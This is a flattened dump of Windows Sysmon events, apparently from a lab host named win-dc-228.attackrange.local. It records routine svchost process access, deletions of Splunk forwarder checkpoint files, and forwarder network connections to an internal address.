14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203932Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203931Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203930Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203929Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203928Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203927Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203926Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203925Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203924Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203923Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203922Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203921Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203920Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203919Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203918Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203950Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:27.118{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DCD947DB603B7EF6CB685865E121288,SHA256=FD7AC118EBC9B85BB6A397B63BADD88DC5F5A42A8FD309BE36BA161534534D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203949Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:27.008{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58A7EDAEEF59D03D4BD4FD9EB9F6918C,SHA256=B9FF721BD1EAF10BFC8C67A93EECFC9E9270EA5F2F23DD8D13C30129EF929BF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203952Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:24.032{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60741-false10.0.1.12-8000- 23542300x80000000000000002203951Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:28.025{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A7F4A563A79CD9AC7A03E0C866822D,SHA256=5759104B7E68F8FD8AC44D91EB45274100745A20237806F42D027E55EA0B98B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203953Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:29.182{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E85E07E243790E147135EC883547883,SHA256=6ECBEA74B4B36303F5A639A1818BD4E22D95B8A5B20F0A4474A95788A3389C8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203954Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:30.193{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C9C88E33E8EE9AB29A66F9B7487A030,SHA256=CD16BB8E97F0DF5E367F5654A04AD5D3C70B90753E20F1FD8DCDD92482960046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203955Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:31.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=353DC95FA107A7275F201EC7610CE899,SHA256=04A5B4DA6D81ADA2A2390051B2D864325DD48DAAAD2033FF9C2C36FBB797BA87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203958Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:32.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAC33382FEE7C03E3A607DD185A704F5,SHA256=CC0DF41D2843169348E44012676CC28A842E0D9DFEA0A0F0FC256EAF37EAF5B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203957Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:32.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A22DB98495C788CA7B09638E776217D,SHA256=822364F37876A633E5FA93D8D6FAC1C14CF02C03187C3CCFE4659BBB91508B51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203956Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:32.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC472C5BF8FE4C72D8F67D81FD59BE54,SHA256=33183A3367C331890854CD2FCD1CDCDA610296B0F6C44C88FCC7C9CA52ECEF59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203960Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:33.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09CB7C84DB2385A6352C03B0B323C243,SHA256=81E5746EF9C2702102569CA90DCEAB5F0D8739A13669D77BB3AB4F34C2323C41,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203959Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:29.077{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60743-false10.0.1.12-8000- 23542300x80000000000000002203961Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:34.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5394BAB9B935C3D7B4BE23D6325F8B51,SHA256=26CC66ED0880E4B6870529461C89C2009216137B3C0F3A1CBFC860A28E5F32C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203962Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:35.259{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687565F2473242496613164A7E579E3D,SHA256=DFBD35E6B513D72D0C5B5C529CB4E6453E2A2022C8462E9842CE5B40E5458626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203963Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:36.275{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=172B2FD6B3F14BF545CF982B82903003,SHA256=3B08F4780A960994C923B1993354D51669EEF334DF92B55D6BED1C1283D42980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203964Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:37.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE570B0ABC93C985C9BF8FD05E628B43,SHA256=4070EE107A74023687D313141C9CC6B97A9EC33E9EC5AD399B50F33A867C7C31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203967Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:38.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E5255DB6FF2523D023489A9DC19F79,SHA256=DCE56C8C24DE63EEBF73425C2CB3A86DE93AB92ADAD5E1A17C0A3E25586DA78B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203966Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:38.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=817108F9374F1E79AA5985A518646048,SHA256=4147D3E91F20DD4CFD648547D0F2C2CB04878AD7FEC47CEF8DCF15D120CF7367,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203965Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:38.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAC33382FEE7C03E3A607DD185A704F5,SHA256=CC0DF41D2843169348E44012676CC28A842E0D9DFEA0A0F0FC256EAF37EAF5B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203969Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:39.322{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7C0E705657376AB920C1330D5B71FDB,SHA256=9A24AA1F9DC9A55CD4C77B8979C85AA68B94A6A77CD1B7D9FDF60B4CCB3962A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203968Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:34.892{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60744-false10.0.1.12-8000- 23542300x80000000000000002203971Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:40.962{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=817108F9374F1E79AA5985A518646048,SHA256=4147D3E91F20DD4CFD648547D0F2C2CB04878AD7FEC47CEF8DCF15D120CF7367,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203970Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:40.322{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E153E97FAA0CC2A7E7B53367B068409,SHA256=FBC67CDE67E5F67F01BF96668061F491377213FAF61C619D9D07E7933E64DD26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203972Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:41.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6725D05C4DE0D90D0671F09A03A70885,SHA256=7873971E66E0406661EA4B98AF66518B804A425C480CE319C292938B94578D05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203974Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:42.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B8D7266539B1173FA5B2966B325F350,SHA256=2C5541D8E6B97E84240ADDCA435D616D8B37173B5FBF2FB4266F37A6DF9995DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203973Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:42.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=735DB3E442EBBFD79E5B5E713F1BAC59,SHA256=1E66E239F54365B88C30F8F5AAC49CC248E35BD4DC3DAF03AD860FB9DFD33187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203975Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:43.384{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3E0257B614B9F85474EF1F2854A563,SHA256=0A94A63B8140601CABEA9F8971E6C4AA0F36ECB0F1871889051587E9F9AD06C4,IMPHASH=00000000000000000000000000000000falsetrue 